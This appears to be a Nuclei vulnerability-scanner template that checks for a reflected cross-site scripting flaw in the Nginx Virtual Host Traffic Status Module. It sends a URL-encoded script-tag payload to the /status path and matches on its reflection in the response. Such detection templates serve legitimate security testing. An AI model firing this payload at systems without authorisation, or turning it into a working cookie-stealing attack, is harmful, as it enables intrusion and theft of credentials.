id: nginx-module-vts-xss

info:
  name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting
  author: madrobot
  severity: high
  description: Nginx Virtual Host Traffic Status Module contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/vozlt/nginx-module-vts
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: nginx,xss,status

requests:
  - method: GET
    path:
      - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert(31337)</script>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

# Enhanced by mp on 2022/09/23
